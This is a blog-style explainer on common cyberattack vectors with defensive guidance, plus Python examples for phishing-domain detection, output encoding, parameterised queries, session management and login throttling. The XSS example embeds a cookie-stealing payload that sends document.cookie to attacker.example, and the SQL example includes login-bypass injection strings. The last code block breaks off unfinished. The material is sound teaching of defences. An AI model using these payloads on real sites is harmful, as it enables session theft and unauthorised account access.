Rocket exploding a 90s style computer, digital art. Made using DALL-E 2

August 07, 2022

Cybersecurity: Most Common Attack Vectors

Each day, millions of new devices connect to the internet. By the end of 2018, an estimated 22 billion devices were connected around the globe. Every one of them brings its own software, configuration, and credentials, so the number of ways an attacker can get into a network grows with the number of devices on it.

By Noah Da Silva. Last updated August 10, 2022.

Cyberattacks are ever-increasing, with attempts happening many times per second worldwide. Knowing how attackers get into corporate infrastructure and personal systems is the first step in reducing the chance of falling victim to one of these attacks.

What is an attack vector?

Attack vectors are different from attack surfaces. An attack surface is the sum of all the points where an attacker could try to get into a system or network: every open port, exposed service, login form, API endpoint, and user with access. The ports opened on a network’s firewall are one example; limiting how many ports are open reduces the network’s attack surface.

An attack vector, on the other hand, is the path or method an attacker uses to reach one of those points and break in. Some vectors target weaknesses in the network’s software and infrastructure; others target the people who have access to it.

Most common attack vectors

We’ll explore some common attack vectors currently being used by bad actors for theft, espionage, and sabotage, as well as how to avoid falling victim to each of them.

Phishing

Phishing is a type of social engineering attack primarily used by attackers posing as a legitimate and trusted institution or person to deceive individuals into sharing user data such as login credentials, banking and credit card details, personally identifiable information (PII), and other sensitive data.

The victim is targeted by email, phone call (vishing), or text message (smishing), and is tricked into clicking a link that leads to a fake login page, or into opening an attachment or link that installs malware on the device.

Vigilance is the first line of defence against phishing. A spoofed message often contains spelling mistakes, odd phrasing, a sense of urgency, and slight changes in the domain name (e.g., www.google.com vs www.gooqle.com). Security awareness training keeps employees alert and teaches habits such as reporting suspicious messages to the security team so the sender can be verified, never clicking links in unexpected external emails, and reaching a site by typing its address or using a bookmark rather than following the link.

Vigilance alone is not enough, because a well-crafted phishing message will fool some users. Setting up two-factor authentication (2FA) wherever possible adds a second check at sign-in; prefer phishing-resistant methods such as FIDO2/WebAuthn security keys or passkeys, since one-time codes sent by SMS or generated by an app can be relayed by a fake login page in real time. Organizations should also enforce sensible password policies: require long passwords, prohibit reusing the same password across applications and websites (a password manager makes this practical), and check new passwords against lists of known breached passwords. Current NIST guidance (SP 800-63B) recommends against forcing routine password changes; change a password when there is reason to believe it has been exposed.
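The lookalike-domain check described above can be automated on the mail gateway. The following is an added example, not code from the original post: it flags sender domains that imitate a trusted list, catching confusable characters (gooqle.com, g00gle.com, a Cyrillic “о” pasted into google.com) and brand names buried in someone else’s subdomain. The TRUSTED_DOMAINS list, the confusable table, and the sample addresses are constructed for illustration; a production version would also consult the Public Suffix List.

```python
"""Spot look-alike sender domains (gooqle.com, g00gle.com, Cyrillic o's).

Added example, not from the original post. TRUSTED_DOMAINS and the sample
addresses are constructed; the confusable table is a small illustrative subset.
"""
import unicodedata

# Assumption: the domains this organisation legitimately receives mail from.
TRUSTED_DOMAINS = {"google.com", "mycorp.com", "example-bank.com"}

# Character sequences attackers swap in because they look alike on screen.
CONFUSABLES = {"rn": "m", "vv": "w", "cl": "d", "0": "o", "1": "l", "|": "l",
               "3": "e", "5": "s", "q": "g"}


def skeleton(name: str) -> str:
    """Collapse visually similar spellings onto one canonical form.

    NFKD splits accented Latin letters (e with accent -> e + combining mark)
    so the mark can be dropped; the ASCII encode then discards anything
    non-Latin, such as a Cyrillic 'o' (U+043E) used in place of a Latin 'o'.
    A homoglyph spoof therefore comes out shorter than the real name, which
    the edit distance in classify_sender still catches.
    """
    s = unicodedata.normalize("NFKD", name.lower())
    s = "".join(c for c in s if not unicodedata.combining(c))
    s = s.encode("ascii", "ignore").decode()
    for bad, good in sorted(CONFUSABLES.items(), key=lambda kv: -len(kv[0])):
        s = s.replace(bad, good)
    return s


def levenshtein(a: str, b: str) -> int:
    """Minimum number of insert/delete/substitute edits to turn a into b."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registered_domain(host: str) -> str:
    """Last two labels of the host. Simplification: a real deployment would
    consult the Public Suffix List so that 'bank.co.uk' is handled correctly."""
    return ".".join(host.split(".")[-2:])


def classify_sender(address: str, max_distance: int = 2) -> str:
    """Return 'trusted', 'lookalike' or 'unknown' for an email sender address."""
    host = address.rsplit("@", 1)[-1].strip().lower()
    domain = registered_domain(host)
    if domain in TRUSTED_DOMAINS:
        return "trusted"
    for trusted in TRUSTED_DOMAINS:
        # Brand buried inside another site's name: google.com.evil.net
        if trusted in host:
            return "lookalike"
        # Near-miss spelling once confusables are normalised away.
        if levenshtein(skeleton(domain), skeleton(trusted)) <= max_distance:
            return "lookalike"
    return "unknown"


if __name__ == "__main__":
    for sender in ("alerts@google.com", "security@gooqle.com",
                   "login@g\u043e\u043egle.com", "x@google.com.evil.net"):
        print(f"{sender:30} {classify_sender(sender)}")
```

A "lookalike" verdict should quarantine or banner the message rather than silently drop it, since legitimate new partners will occasionally land within the edit-distance threshold; the threshold of 2 is a starting point to tune against your own mail flow.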

Malware

Malicious software, or malware, is software designed to damage, disable, or take control of devices or networks. Attackers use it to compromise device functions, steal data, bypass access controls, and spread to other devices on the same network. Common delivery routes are phishing email attachments and links, drive-by downloads from compromised or malicious websites, rogue Wi-Fi hotspots, and planted “lost” USB devices.

An infected device often shows symptoms such as slow performance, random reboots, unknown processes starting and stopping, and emails being sent without the user’s knowledge. Well-written malware, however, is designed to show no symptoms at all, so the absence of symptoms is not evidence of a clean system.

There are many ways to protect devices from malware. One of the most important is up-to-date anti-malware software, which scans downloaded files and running processes against signatures and behaviour patterns and updates itself to recognize the newest known malware. It does not vet software that asks for administrative privileges; that decision still rests with the user at the operating system’s permission prompt, so be deliberate about what gets approved.

A firewall is another good prevention method: it blocks unauthorized connections to or from a network, limiting an attacker’s chances of reaching a device and of installed malware calling home. Updating operating systems and software regularly removes known vulnerabilities that outdated versions still carry. Finally, not clicking suspicious links or opening attachments from external emails, and only downloading apps and files from trusted sources, greatly reduce the chances of ever running malware by accident.

Malicious code injection

Code injection is an attack that exploits an input validation flaw in software, a website, or a program to get attacker-supplied code executed; when the injected code runs on the server, the result is remote code execution (RCE). The injected code is written in the language of the targeted application and is executed by the server-side interpreter with the same privileges as the application itself.

To protect infrastructure from code injection attacks, treat all input as untrusted. Validate inputs sent to the server or application against an allow-list of the values the function actually expects (a specific format, a fixed set of options, a numeric range) and reject everything else, rather than trying to strip out known-bad patterns.

Never pass raw user input to functions that evaluate or load code. In PHP these include eval(), include(), require(), assert() (which evaluated string arguments as code before PHP 8), preg_replace() with the old /e modifier (removed in PHP 7), create_function(), and others; every popular language has equivalents, such as eval in JavaScript and Python, exec in Python, and shell-spawning calls in all of them.

Another good practice is to lock down the interpreter that receives the input so that it only has the functionality the application needs. This shrinks the application’s attack surface: functions the program never uses are disabled, so injected code cannot call them. For PHP, the disable_functions directive in php.ini is commonly used to turn off exec(), shell_exec(), system(), passthru(), show_source(), and similar. Running the interpreter as a low-privilege user, inside a container, or with open_basedir restrictions limits what an attacker gains even when an injection succeeds.

Cross-site scripting (XSS) attack

Cross-site scripting is another type of injection attack that takes advantage of unsanitized user input. Here the malicious script is injected into a page that the website renders, and the target is not the server but the browser of every user who views that page. “Cross-site” refers to the fact that the attacker’s script does not come from the visited site’s own developers, yet it runs as if it did, with that site’s origin and privileges in the browser.

By running script code, usually JavaScript, inside the user’s session, an attacker can read cookies that are not marked HttpOnly, hijack the session, impersonate the user, and take actions in their account. Because the script runs with the site’s origin, it also inherits any permissions the user has already granted that site (camera, microphone, location) and can inject forms that trigger the browser’s autofill of saved credentials and payment details. Whether the user’s operating-system account is an administrator makes no difference; the browser’s same-origin boundary, not the OS privilege level, is what the attack abuses.

As a user there isn’t much that can be done beyond exercising caution with links on questionable webpages, checking the domain name of the site being visited, and keeping the browser up to date; the flaw lives in the website, not in the browser.

For developers, the main defence is context-sensitive output encoding as recommended by OWASP: encode untrusted data differently depending on whether it lands in HTML text, an attribute, a JavaScript string, a URL, or CSS, ideally through a templating engine that does this automatically. Validate input, add a Content Security Policy to limit where scripts can load from, mark session cookies HttpOnly, and apply the same input-handling discipline as for regular code injection.
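The following added example (not code from the original post) shows what context-sensitive encoding means in practice: the same attacker-supplied comment is rendered once by naive string concatenation and once through encoders chosen for the HTML text, HTML attribute, and JavaScript-string contexts. The comment page, the attacker’s payload, and the function names are constructed for the example; only the Python standard library is used.

```python
"""Rendering untrusted text into HTML: vulnerable vs. context-aware encoding.

Added example, not from the original post. The page fragment and the
attacker's comment are constructed; only the standard library is used.
"""
import html
import json

# Constructed attacker input: the classic cookie-stealing payload shape.
ATTACKER_COMMENT = (
    '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'
)


def render_vulnerable(comment: str) -> str:
    """'Before': the comment is concatenated into the page unchanged, so the
    browser parses the attacker's markup as part of the site."""
    return f'<p class="comment">{comment}</p>'


def encode_html_text(value: str) -> str:
    """Element-content context: &, <, >, and both quote characters become entities."""
    return html.escape(value, quote=True)


def encode_html_attr(value: str) -> str:
    """Attribute context: same entities, and the caller must quote the attribute
    so a stray space cannot start a new attribute such as onmouseover=..."""
    return html.escape(value, quote=True)


def encode_js_string(value: str) -> str:
    """JavaScript-string context inside a <script> block. json.dumps handles
    quotes and backslashes; '<', '>' and '&' are additionally escaped so the
    text can never close the <script> element or open a tag."""
    return (json.dumps(value)
            .replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026"))


def render_safe(comment: str, author: str) -> str:
    """'After': each interpolation point uses the encoder for its own context."""
    return (
        f'<p class="comment" data-author="{encode_html_attr(author)}">'
        f'{encode_html_text(comment)}</p>\n'
        f'<script>const lastComment = {encode_js_string(comment)};</script>'
    )


def contains_live_tag(page: str) -> bool:
    """Crude check: is there still an unescaped <img tag the browser would run?"""
    return "<img" in page


if __name__ == "__main__":
    print(render_vulnerable(ATTACKER_COMMENT))
    print(render_safe(ATTACKER_COMMENT, "mallory"))
```

Note that one encoder does not fit all contexts: html.escape makes the payload harmless in HTML text, but the same output dropped inside a script block would still terminate the string and run, which is why the JavaScript context gets its own encoder. Template engines such as Jinja2 with autoescaping do the HTML part for you; the script and URL contexts still need deliberate handling.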

SQL injection

SQL is the language used to query and modify relational databases. Attackers exploit applications that build SQL statements by concatenating user input into the query text: by entering SQL fragments into input fields on a website or application, they can read vast amounts of sensitive data, modify it, or destroy the database entirely.

The attack occurs wherever a user is asked to enter information, such as a username, email, password, search term, or any other value that ends up in a query. The attacker enters SQL syntax in place of the expected value, hoping the application does not properly separate data from the query, so that the database runs the attacker’s statement.

The primary defence is to use parameterised queries (prepared statements), so that user input is always passed to the database as data and can never change the structure of the statement. The general code injection protections above, input validation and least privilege for the database account the application uses, further limit the damage.
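Here is an added example (not code from the original post) of the difference between a concatenated query and a parameterised one, using an in-memory SQLite database with a constructed users table so it runs offline. The vulnerable login accepts the classic tautology payload and a comment-based password bypass; the parameterised login treats both as ordinary, non-matching usernames. The SHA-256 hash is only there to keep the example self-contained; real password storage needs a slow, salted KDF.

```python
"""SQL injection in a login check, and the parameterised query that fixes it.

Added example, not from the original post. Uses an in-memory SQLite database
with a constructed users table so it runs offline with the standard library.
"""
import hashlib
import sqlite3


def _h(password: str) -> str:
    # SHA-256 keeps the example self-contained. Real password storage must use
    # a slow, salted KDF such as bcrypt, scrypt or Argon2 (see brute force below).
    return hashlib.sha256(password.encode()).hexdigest()


def setup_db() -> sqlite3.Connection:
    """Constructed fixture: one user, alice, with password 'correct horse'."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("alice", _h("correct horse")))
    conn.commit()
    return conn


def login_vulnerable(conn, username: str, password: str) -> bool:
    """'Before': the statement is assembled with string formatting, so a
    username such as  ' OR '1'='1' --  rewrites the WHERE clause and the
    trailing -- comments out the password check entirely."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND pw_hash = '{_h(password)}'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username: str, password: str) -> bool:
    """'After': placeholders send the input to the driver as data. It can be
    any string at all, but it can never alter the statement's structure."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND pw_hash = ?",
        (username, _h(password)),
    ).fetchone()
    return row is not None


def run_demo() -> dict:
    """Run both versions against the same constructed payloads."""
    conn = setup_db()
    tautology = "' OR '1'='1' --"   # makes the WHERE clause always true
    comment_out = "alice' --"        # valid user, password check commented away
    return {
        "safe_correct": login_safe(conn, "alice", "correct horse"),
        "safe_wrong": login_safe(conn, "alice", "wrong"),
        "vuln_tautology": login_vulnerable(conn, tautology, "anything"),
        "vuln_comment": login_vulnerable(conn, comment_out, "wrong"),
        "safe_tautology": login_safe(conn, tautology, "anything"),
        "safe_comment": login_safe(conn, comment_out, "wrong"),
    }


if __name__ == "__main__":
    for name, outcome in run_demo().items():
        print(f"{name:15} logged in = {outcome}")
```

The same placeholder discipline applies to every database driver and ORM; the failure mode to watch for is code that builds parts of a statement (a column name, an ORDER BY clause) from input, since placeholders only cover values and those parts need an allow-list instead.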

Compromised, stolen, or weak credentials

Credentials are everywhere, it is impossible to do anything online without using them. Yet, they continue to be a prime target for attackers to exploit.

With the rise in the number of data breaches, phishing scams, and malware infections over the past few years, getting credentials exposed to potential bad actors is only getting more common.

The risk posed by compromised or stolen credentials depends on the level of access they grant. Some only provide low-level access, but others provide privileged, administrative access to network devices, systems, and security tools, giving an attacker almost unfettered control over the victim’s digital infrastructure.

Compromised and stolen credentials aren’t the only risk. Weak and reused passwords are just as dangerous, because attackers can guess them, brute-force them, or simply replay them from another site’s breach (credential stuffing).

Good password hygiene is crucial. Use a different password for every account and never reuse an old one, use long passwords (length matters more than complexity), turn on two-factor authentication wherever possible, and change a password promptly when it has been exposed in a breach. Forcing routine monthly changes is no longer recommended (see NIST SP 800-63B): it pushes users toward predictable variations of the same password.

Use a password manager to generate and store credentials safely; a physical notebook kept somewhere secure is better than reuse, but it cannot generate strong passwords or autofill them only on the correct domain. Avoid sharing credentials at all where possible (most password managers can share an entry without revealing it); when it is necessary, use an end-to-end encrypted channel such as Signal rather than email, SMS/MMS, or ordinary chat apps. Note that Telegram’s regular chats are not end-to-end encrypted; only its “secret chats” are.

Malicious insiders

A malicious insider is a current or former employee, contractor, or partner with legitimate access to an organization who steals or discloses private company information, or exploits weaknesses they know about from the inside. The motive is often money, a grievance, or both. Someone with access to sensitive data or networks can do extensive damage by misusing privileged access or by selling that information to other bad actors.

To protect against malicious insiders, an organization needs visibility: log and monitor access to sensitive data and systems, establish what normal behaviour looks like for each role, and alert on deviations such as bulk downloads, access outside working hours, or use of data unrelated to the person’s job.

Limiting which employees can access which corporate data, and who can handle it, by compartmentalizing data, access levels, and permissions (least privilege), addresses the risk at its root: it reduces both the chance of an insider incident and the damage one can do. Removing access promptly when someone changes role or leaves is part of the same control.

Missing or poor encryption

Strong encryption ensures that communications cannot be read or altered by outsiders, defeating man-in-the-middle attacks. TLS (the protocol behind HTTPS, authenticated by the server’s certificate) keeps credit card transactions and other web traffic private and authenticated; DNSSEC, by contrast, does not encrypt anything but signs DNS records so that clients are not sent to an impostor’s address. Encryption of stored data protects it if a disk or backup is stolen.

If data at rest, in processing, or in transit is unencrypted or weakly encrypted, it can be read by anyone who gets hold of the storage or intercepts the traffic, or recovered by brute force if the algorithm or key is weak.

A common way to end up without encryption is an expired TLS certificate. The site does not silently fall back to HTTP, but browsers show a full-page warning, users learn to click through it, and operators under pressure sometimes disable HTTPS until the certificate is replaced. Automating renewal (for example with ACME) and monitoring certificate expiry dates prevents this.

It is also a good idea not to rely on obsolete algorithms such as DES: its 56-bit key can be brute-forced in days on commodity hardware and far faster with specialised hardware. Triple DES, which replaced it, is itself deprecated (NIST disallows it for new use after 2023) because of its small 64-bit block size. Use AES, ideally in an authenticated mode such as AES-GCM, or ChaCha20-Poly1305, and a current TLS version (1.2 or 1.3).

Lastly, compliance does not equal security. Assuming that meeting a compliance standard means data is encrypted and secured would be a mistake. Most standards have a limited scope, are simply pass or fail, and give no credit for going beyond the baseline. Because organizations are always changing, an audit reflects a snapshot, often misses security flaws, and rarely covers the entire infrastructure.

Misconfiguration

Attackers exploit misconfigurations in a company’s infrastructure. A misconfiguration is an error in how a system is set up that creates an unintended point of entry or weakens a security control, for example a service left with its default credentials, an administrative interface exposed to the internet, a cloud storage bucket that is publicly readable, a debug mode left on in production, or overly permissive file or share permissions. Failing to change default credentials is a particularly serious one, because the defaults are published in the vendor’s documentation.

To avoid misconfigurations, define secure baseline configurations (for example from CIS Benchmarks or vendor hardening guides), apply them through automation so that every system starts from the same state, and monitor deployed settings against the baseline so that drift is detected when it occurs. Regular configuration and vulnerability scans catch the rest.

Ransomware

Ransomware is a form of malware that encrypts a victim’s data and holds it to ransom, cutting off access to files, databases, and applications. It is often designed to spread across a network and target every database, file server, and workstation it can reach, which can bring an organization’s operations to a halt within hours. Many current operators also steal the data before encrypting it and threaten to publish it, so that backups alone do not end the extortion.

Victims are then told to pay a ransom in cryptocurrency, ranging from hundreds of dollars for individuals to millions for large organizations, in exchange for the decryption key.

Note that it is not guaranteed that the attacker will release the decryption key. Some attackers never intend on giving back the encrypted data, scamming the victims out of their money and data.

To avoid falling victim to ransomware, keep operating systems and software up to date to reduce the chance of an exploitable vulnerability, and be careful about what software is installed and granted administrative privileges, especially when it did not come from a trusted source. The single most important control is backups: keep regular backups that are offline or otherwise immutable so the ransomware cannot encrypt them too, and test restoring from them. Least privilege and network segmentation limit how far an infection can spread.

Zero-day vulnerabilities and outdated software

New vulnerabilities are found every day in operating systems and applications. For developers, patching them can feel like a game of cat and mouse.

Left unchecked, outdated software carries old, well-documented vulnerabilities for which exploits are often publicly available. Regularly updating devices and software on a network ensures that no known, already-patched vulnerability is left for attackers.

Zero-day vulnerabilities are different: a zero-day is a flaw that is exploited before the vendor has a fix available (the vendor has had “zero days” to patch it). There is nothing to update, so prevention relies on defence in depth: least privilege, network segmentation, application allow-listing, the operating system’s exploit mitigations, and monitoring that can catch post-exploitation activity even when the initial exploit is unknown. Once a patch is released the window closes, which is why fast patching matters.

DDoS attacks

Distributed Denial of Service (DDoS) attacks are malicious attempts to make network resources such as data centers, websites, or servers unavailable. They are carried out by botnets: groups of compromised machines that can include computers, IoT devices, and other networked equipment.

The goal of a DDoS attack is to overwhelm the target with more traffic or requests than it can handle, causing the target or its surrounding infrastructure to slow down or crash and go offline. Floods may target raw bandwidth, protocol state (SYN floods, for example), or the application itself with expensive requests, and each layer needs its own defences.

There are a few ways to help mitigate DDoS attacks. The first method would be to design infrastructure with redundancy in mind. The easiest way to accomplish this would be to ensure that data servers have different networks and paths, locating them in different data centers at separate geographical points and utilizing multiple service providers.

The second method is to put the origin behind a filtering reverse proxy or web application firewall. Cloudflare is one example of a service that absorbs and filters attack traffic at its edge and hides the web server’s real IP address, so the server cannot be hit directly.

Another is to host with a large cloud provider such as AWS, Azure, DigitalOcean, or Linode. Their capacity and anycast networks absorb far more traffic than a single site can, and most of them offer some level of DDoS protection, either included or at an extra cost. This is not a guarantee of uptime, though: application-level floods can still exhaust the instances behind the provider’s network-layer protection.

If a DDoS attack gets through, there are blunter methods that help limit the damage.

One option for web servers is to reroute traffic to a static version of the website, which doesn’t have full functionality but requires fewer resources.

Another is to limit the rate of requests any single client may make to the server, or to cap the bandwidth of inbound traffic, so that no one source can consume everything.

Alternatively, blackhole routing is a more extreme remedy. When implemented, it routes all traffic destined for the attacked address, malicious or not, to a null route and drops it. This keeps the flood from affecting the rest of the network, but it also completes the attacker’s goal for that address: the target is offline until the blackhole is lifted.

Man-in-the-middle attack

A man-in-the-middle (MitM) attack is a type of cyberattack, classified as eavesdropping and tampering, in which an attacker sits between two network endpoints, usually the victim and a legitimate host, and intercepts their communications. The goal is to steal information or login credentials, spy on victims, sabotage communications, or corrupt data.

The attack can be very difficult to detect, since the traffic is either rerouted to a phishing site or passed on to its original destination once it has been captured or altered.

Thankfully, protecting against MitM attacks mostly comes down to encryption combined with authentication. Encryption keeps the attacker from reading the traffic; authentication (checking the server’s certificate, and never clicking through certificate warnings) keeps the attacker from impersonating the other end. Strong encryption without authentication only guarantees a private conversation with whoever is in the middle.

Use WPA2 or, where supported, WPA3 on wireless access points; WEP and the original WPA are broken and let a nearby outsider join or decrypt a private network. It is also very important to change the default administrative login on routers and modems. This is separate from the Wi-Fi password: it is the router’s own management credentials, which by default are almost always “admin”/“admin” or “admin”/“password”, so an attacker who reaches the device can take it over and redirect all of the network’s traffic.

Force HTTPS instead of HTTP so that the web server and browser negotiate a TLS session, in which the server proves its identity with its certificate and the two sides agree on a key that only they know. HTTP Strict Transport Security (HSTS) tells browsers to refuse plain HTTP for the site afterwards, which closes the downgrade window on later visits.

Another is to use a virtual private network (VPN), especially on public Wi-Fi networks in hotels, coffee shops, and airports. A VPN creates an encrypted tunnel from the device to the VPN provider’s exit server, which then forwards the traffic to its destination. This moves the trust from the coffee shop’s network to the VPN provider; traffic between the exit server and the destination is only protected if it is also using HTTPS.

Session hijacking

Session hijacking is an attack in which an attacker takes over a user’s session, most often a browser session with a web application, although any kind of session can be hijacked.

HTTP is stateless, so a web application identifies a logged-in user by a session cookie that the browser sends with every request. For an attacker to hijack a victim’s session, they first need the session identifier, which they can obtain by stealing that cookie.

One way to steal it is cross-site scripting (XSS). If the web application has an XSS flaw and the cookie is readable from JavaScript, the attacker’s injected script can read it from document.cookie and send it to a server they control.

The second way is session side-jacking. Here the attacker sniffs the network traffic with a packet capture tool and collects the cookie after the victim has authenticated. This works when a site uses TLS only for its login page and serves the rest of the session over plain HTTP, or when the cookie lacks the Secure attribute and so is sent over any HTTP connection.

A third method, session fixation, differs from the first two. Instead of stealing the session identifier, the attacker supplies one (for example in a link) and tricks the victim into logging in with it on a vulnerable site that keeps the same identifier across authentication; the attacker then already knows the identifier of the authenticated session.

If an attacker successfully hijacks a user’s session, they can perform any action that the user would be authorized to do. The more privileges the user has, the more damage an attack can do.

To prevent session hijacking, web applications need to be hardened. One way is to use HTTPS for the entire session, not just the login page, so that session identifiers are never sent in plaintext; this defeats packet sniffing.

Setting the HttpOnly attribute on the session cookie stops client-side scripts from reading it, which protects the identifier against theft via cross-site scripting (the browser still sends the cookie with requests; it just cannot be read from JavaScript). The Secure attribute stops the cookie from being sent over plain HTTP, and SameSite limits which cross-site requests carry it.

Other methods include using the web framework’s session management rather than a home-grown one, regenerating the session identifier immediately after login (and after any privilege change) so that a pre-login identifier an attacker might have planted becomes useless, setting idle and absolute timeouts, and performing additional checks such as comparing the client’s IP address or usage patterns against the session and asking the user to re-authenticate on a mismatch.
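The controls above fit together in a small server-side session store. The following is an added example (not code from the original post): random identifiers from the OS CSPRNG, rotation of the identifier at login to defeat fixation, the cookie attributes discussed, an idle timeout, and an IP-binding check. The class names, the 15-minute timeout, and the demo’s IP addresses are this example’s own assumptions; the clock is injectable so the expiry path can be exercised without waiting.

```python
"""A session store with the anti-hijacking controls listed above.

Added example, not from the original post. Random IDs, rotation at login
(defeats fixation), HttpOnly/Secure/SameSite cookie flags, idle timeout and
an IP-binding check. Names and the 15-minute timeout are this example's own.
"""
import secrets
import time
from dataclasses import dataclass
from typing import Callable, Dict, Optional

IDLE_TIMEOUT = 15 * 60  # seconds; assumption for the example


@dataclass
class Session:
    ip: str
    last_seen: float
    user: Optional[str] = None  # None until the user authenticates


class SessionStore:
    def __init__(self, clock: Callable[[], float] = time.time):
        self._sessions: Dict[str, Session] = {}
        self._clock = clock  # injectable so expiry can be tested without sleeping

    @staticmethod
    def _new_id() -> str:
        # 256 bits from the OS CSPRNG: not guessable, unlike counters or timestamps.
        return secrets.token_urlsafe(32)

    def create(self, ip: str) -> str:
        """Anonymous pre-login session (e.g. for a shopping basket)."""
        sid = self._new_id()
        self._sessions[sid] = Session(ip=ip, last_seen=self._clock())
        return sid

    def login(self, sid: str, user: str, ip: str) -> str:
        """Authenticate and rotate the identifier. The pre-login ID, which an
        attacker may have planted in the victim's browser (session fixation),
        is discarded; only the fresh ID is ever tied to the account."""
        self._sessions.pop(sid, None)
        new_sid = self._new_id()
        self._sessions[new_sid] = Session(ip=ip, last_seen=self._clock(), user=user)
        return new_sid

    def resolve(self, sid: str, ip: str) -> Optional[str]:
        """Map a presented cookie to an authenticated user, or None."""
        s = self._sessions.get(sid)
        if s is None or s.user is None:
            return None
        now = self._clock()
        if now - s.last_seen > IDLE_TIMEOUT:
            del self._sessions[sid]  # a stolen cookie is only useful briefly
            return None
        if s.ip != ip:
            # Assumption: sessions are bound to the client IP. Fine on an internal
            # app; for mobile users whose address changes, prompt for
            # re-authentication instead of silently rejecting.
            return None
        s.last_seen = now
        return s.user

    def logout(self, sid: str) -> None:
        self._sessions.pop(sid, None)


def session_cookie(sid: str) -> str:
    """Set-Cookie value. HttpOnly keeps document.cookie (XSS) away from it,
    Secure stops it crossing plain HTTP (side-jacking), SameSite=Strict keeps
    cross-site requests from carrying it, and the __Host- prefix makes the
    browser enforce Secure plus Path=/ with no Domain attribute."""
    return f"__Host-sid={sid}; Path=/; Secure; HttpOnly; SameSite=Strict"


def demo_fixation() -> dict:
    """Walk through a fixation attempt, a cross-IP replay and idle expiry."""
    t = [1_000.0]
    store = SessionStore(clock=lambda: t[0])
    planted = store.create("203.0.113.9")            # attacker obtains a pre-login ID
    sid = store.login(planted, "alice", "10.0.0.5")  # victim logs in with the planted ID
    results = {
        "planted_id_rotated": sid != planted,
        "planted_id_dead": store.resolve(planted, "203.0.113.9") is None,
        "owner_ok": store.resolve(sid, "10.0.0.5") == "alice",
        "stolen_from_other_ip": store.resolve(sid, "203.0.113.9"),  # None
    }
    t[0] += IDLE_TIMEOUT + 1
    results["expired_after_idle"] = store.resolve(sid, "10.0.0.5") is None
    return results


if __name__ == "__main__":
    print(demo_fixation())
    print(session_cookie("example-id"))
```

In a real deployment the dictionary becomes a server-side store such as Redis, and the session ID in the cookie remains the only thing the client ever holds; the user and expiry data never leave the server, so there is nothing for the client to tamper with.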

For users, using a VPN, especially when connected to public Wi-Fi, will help keep sessions private and secure, making it considerably more difficult for attackers to access sensitive information that has the potential to expose a session key.

Brute force attacks

A brute force attack uses trial-and-error to guess or crack login credentials, encryption keys, or hidden web pages.

It is less an attack vector in its own right than a technique used alongside the other vectors listed above: guessed credentials, cracked keys, and discovered hidden pages are each a way in.

While being an old attack method, brute force is still effective and a popular option for attackers to start their attacks.

An organization failing to properly secure its infrastructure could put itself in a position where brute force may be a feasible option for attackers.

Brute force attacks benefit from a range of vulnerabilities, like weak or short passwords, outdated or weak encryption standards, unsecured network devices, and more.

To protect against brute force attacks, make sure the encryption standards in use are current and strong, that every device on the network has had its default credentials replaced, and that all accounts have long passwords and two-factor authentication (2FA) where possible. On the server side, store passwords with a slow, salted hash (bcrypt, scrypt, or Argon2) so that a stolen database cannot be cracked quickly, throttle or lock out repeated failed logins per account and per source address, and alert on the pattern of many failures.
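One sliding-window counter serves both the request rate limiting mentioned as a DDoS mitigation above and the failed-login throttling described here. The following is an added example (not code from the original post): a per-source request limiter, a per-account lockout after repeated failures, and a per-source failure cap that catches password spraying (one password tried against many accounts, which per-account lockout alone misses). The thresholds, class names, and the sample attempt log are constructed for the example and are not a recommendation.

```python
"""Sliding-window request limiting (floods) and failed-login throttling (brute force).

Added example, not from the original post. One counter serves both the
DDoS-section rate limit and the brute-force defence. Thresholds, names and
the sample attempt log are constructed for illustration.
"""
from collections import defaultdict, deque


class SlidingWindow:
    """Per-key event counter over the last `window` seconds (timestamps in a deque)."""

    def __init__(self, window: float):
        self.window = window
        self._events = defaultdict(deque)

    def _prune(self, key, now):
        q = self._events[key]
        while q and q[0] <= now - self.window:
            q.popleft()
        return q

    def add(self, key: str, now: float) -> int:
        q = self._prune(key, now)
        q.append(now)
        return len(q)

    def count(self, key: str, now: float) -> int:
        return len(self._prune(key, now))


class LoginGate:
    """Thresholds are assumptions for the example, not a recommendation."""

    def __init__(self, req_per_10s=20, user_fails=5, ip_fails=20, lockout=900.0):
        self.requests = SlidingWindow(10.0)    # flood control, any endpoint
        self.failures = SlidingWindow(300.0)   # failed logins, 5-minute window
        self.req_per_10s, self.user_fails, self.ip_fails = req_per_10s, user_fails, ip_fails
        self.lockout = lockout
        self.locked_until = {}

    def admit(self, ip: str, now: float) -> bool:
        """Per-source rate limit: the 'limit the rate of requests' DDoS mitigation."""
        return self.requests.add(ip, now) <= self.req_per_10s

    def check_login(self, user: str, ip: str, now: float) -> str:
        if self.locked_until.get(user, 0.0) > now:
            return "locked"          # account under temporary lockout
        if self.failures.count("ip:" + ip, now) >= self.ip_fails:
            return "ip-throttled"    # password spraying: many accounts, one source
        return "ok"

    def record_failure(self, user: str, ip: str, now: float) -> None:
        self.failures.add("ip:" + ip, now)
        if self.failures.add("user:" + user, now) >= self.user_fails:
            self.locked_until[user] = now + self.lockout

    def record_success(self, user: str, now: float) -> None:
        self.locked_until.pop(user, None)


def replay(attempts, gate=None):
    """Run (time, ip, user, password_correct) attempts through the gate and
    return the decision made for each one."""
    gate = gate or LoginGate()
    out = []
    for now, ip, user, ok in attempts:
        if not gate.admit(ip, now):
            out.append("rate-limited")
            continue
        verdict = gate.check_login(user, ip, now)
        if verdict != "ok":
            out.append(verdict)
            continue
        if ok:
            gate.record_success(user, now)
            out.append("success")
        else:
            gate.record_failure(user, ip, now)
            out.append("failed")
    return out


# Constructed sample: one attacker address guesses alice's password eight times
# in eight seconds, then alice herself logs in correctly from her own address,
# first during the lockout and again after it has expired.
SAMPLE = [(float(i), "203.0.113.7", "alice", False) for i in range(8)] + [
    (9.0, "198.51.100.20", "alice", True),
    (1000.0, "198.51.100.20", "alice", True),
]

if __name__ == "__main__":
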